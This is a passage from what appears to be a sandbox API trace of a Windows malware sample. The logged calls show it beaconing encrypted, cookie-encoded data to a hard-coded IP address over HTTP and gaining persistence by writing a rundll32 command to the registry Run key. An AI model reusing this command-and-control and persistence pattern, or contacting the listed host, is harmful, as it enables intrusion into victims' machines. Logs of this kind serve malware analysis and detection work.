lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0498.286] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0498.286] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0498.286] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0498.287] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0498.287] GetProcessHeap () returned 0x530000 [0498.287] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0498.287] GetProcessHeap () returned 0x530000 [0498.287] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0498.287] GetProcessHeap () returned 0x530000 [0498.287] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0498.287] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0498.288] GetProcessHeap () returned 0x530000 [0498.288] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0498.288] GetProcessHeap () returned 0x530000 [0498.289] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0498.289] GetProcessHeap () returned 0x530000 [0498.289] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0498.289] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0498.289] GetProcessHeap () returned 0x530000 [0498.289] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0498.289] GetProcessHeap () returned 0x530000 [0498.289] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0498.289] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0498.289] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0498.289] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0498.289] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0498.289] GetProcessHeap () returned 0x530000 [0498.290] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0498.290] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0498.290] GetProcessHeap () returned 0x530000 [0498.290] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0498.290] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0498.290] GetProcessHeap () returned 0x530000 [0498.290] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0498.290] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf4b4) returned 0x0 [0498.290] GetProcessHeap () returned 0x530000 [0498.290] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xfc) returned 0x5d0230 [0498.290] GetProcessHeap () returned 0x530000 [0498.291] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0498.291] GetProcessHeap () returned 0x530000 [0498.291] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0498.291] CryptBinaryToStringW (in: pbBinary=0x5d0230, cbBinary=0xfc, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0498.291] GetProcessHeap () returned 0x530000 [0498.291] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a2) returned 0x2a89708 [0498.291] CryptBinaryToStringW (in: pbBinary=0x5d0230, cbBinary=0xfc, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTmxdgAAPRm5hgDCOFQldUlZcXxJ8QlW4NLNo7Jvky8gSzz4VjN0tw+mIRsMDEH6Zkgfnp+J+iqB4BG6LS0P30pOa4dAwk12y9l+61WoIadwGEj3kJxCp/Qs1b3/c", pcchString=0x2cf504) returned 1 [0498.291] GetProcessHeap () returned 0x530000 [0498.292] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0498.292] GetProcessHeap () returned 0x530000 [0498.292] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0498.292] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: lHQwuYpqo=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTmxdgAAPRm5hgDCOFQldUlZcXxJ8QlW4NLNo7Jvky8gSzz4VjN0tw+mIRsMDEH6Zkgfnp+J+iqB4BG6LS0P30pOa4dAwk12y9l+61WoIadwGEj3kJxCp/Qs1b3/c\r\n") returned 356 [0498.292] GetProcessHeap () returned 0x530000 [0498.292] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0498.292] GetProcessHeap () returned 0x530000 [0498.292] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0498.293] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0498.293] GetProcessHeap () returned 0x530000 [0498.293] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0498.293] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0498.295] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="PjNtLFourlwOKpzxahYuFVlaUiWQiNRwnyBuXSyDBtQBExDgjyWUdVZ", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0498.296] GetProcessHeap () returned 0x530000 [0498.296] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0498.296] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0498.296] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0498.296] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0498.296] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: lHQwuYpqo=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTmxdgAAPRm5hgDCOFQldUlZcXxJ8QlW4NLNo7Jvky8gSzz4VjN0tw+mIRsMDEH6Zkgfnp+J+iqB4BG6LS0P30pOa4dAwk12y9l+61WoIadwGEj3kJxCp/Qs1b3/c\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0499.493] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0499.493] GetProcessHeap () returned 0x530000 [0499.493] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0499.493] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x43e) returned 1 [0499.493] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4823e, dwNumberOfBytesToRead=0xfbc2, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4823e*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0499.494] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0499.494] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0499.494] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0499.494] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0499.494] GetProcessHeap () returned 0x530000 [0499.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0499.494] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bf98, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bf98, pcbResult=0x2cf51c) returned 0x0 [0499.494] GetProcessHeap () returned 0x530000 [0499.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0499.494] GetProcessHeap () returned 0x530000 [0499.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0499.494] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0499.495] GetProcessHeap () returned 0x530000 [0499.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0499.495] GetProcessHeap () returned 0x530000 [0499.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0499.496] GetProcessHeap () returned 0x530000 [0499.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0499.496] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0499.496] GetProcessHeap () returned 0x530000 [0499.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0499.496] GetProcessHeap () returned 0x530000 [0499.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0499.496] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0499.496] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58bfe0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0499.496] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0499.496] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0499.496] GetProcessHeap () returned 0x530000 [0499.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0499.497] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0499.497] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bf9c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0499.500] GetProcessHeap () returned 0x530000 [0499.500] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c710 [0499.500] GetProcessHeap () returned 0x530000 [0499.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0499.500] GetProcessHeap () returned 0x530000 [0499.501] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0499.501] GetProcessHeap () returned 0x530000 [0499.501] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d0230 | out: hHeap=0x530000) returned 1 [0499.501] GetProcessHeap () returned 0x530000 [0499.502] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0499.502] GetProcessHeap () returned 0x530000 [0499.502] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0499.502] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0499.502] GetProcessHeap () returned 0x530000 [0499.502] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83c20 [0499.502] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",SuMZv") returned 95 [0499.502] GetProcessHeap () returned 0x530000 [0499.503] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83c20 | out: hHeap=0x530000) returned 1 [0499.503] GetProcessHeap () returned 0x530000 [0499.503] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0499.503] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x660, lpdwDisposition=0x0) returned 0x0 [0499.503] GetProcessHeap () returned 0x530000 [0499.503] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0499.503] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",SuMZv") returned 95 [0499.503] RegSetValueExW (in: hKey=0x660, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",SuMZv", cbData=0xc0 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",SuMZv") returned 0x0 [0499.504] RegCloseKey (hKey=0x660) returned 0x0 [0499.504] GetProcessHeap () returned 0x530000 [0499.504] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c710 | out: hHeap=0x530000) returned 1 [0499.504] GetProcessHeap () returned 0x530000 [0499.505] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0499.505] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe81d9) returned 0x102 [0509.578] GetProcessHeap () returned 0x530000 [0509.578] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0509.578] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0509.578] GetProcessHeap () returned 0x530000 [0509.578] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0509.578] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0509.578] GetProcessHeap () returned 0x530000 [0509.578] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0509.578] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0509.578] GetProcessHeap () returned 0x530000 [0509.578] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0509.578] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0509.580] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0509.580] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0509.580] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0509.580] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0509.581] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0509.581] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0509.581] GetProcessHeap () returned 0x530000 [0509.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0509.581] GetProcessHeap () returned 0x530000 [0509.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0509.581] GetProcessHeap () returned 0x530000 [0509.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0509.581] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0509.583] GetProcessHeap () returned 0x530000 [0509.583] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0509.583] GetProcessHeap () returned 0x530000 [0509.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0509.584] GetProcessHeap () returned 0x530000 [0509.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0509.584] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0509.584] GetProcessHeap () returned 0x530000 [0509.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0509.584] GetProcessHeap () returned 0x530000 [0509.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0509.584] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0509.584] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0509.584] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0509.584] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0509.584] GetProcessHeap () returned 0x530000 [0509.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0509.584] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0509.585] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0509.585] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb8) returned 0x2a7ac48 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0509.585] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb8, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0509.585] GetProcessHeap () returned 0x530000 [0509.585] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1f2) returned 0x5edef0 [0509.585] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb8, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjOKgqttiLC8/nXg9gBkfcZ0CdNMh3Nrww==", pcchString=0x2cf504) returned 1 [0509.585] GetProcessHeap () returned 0x530000 [0509.586] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0509.586] GetProcessHeap () returned 0x530000 [0509.586] RtlAllocateHeap (HeapHandle=0x530000, 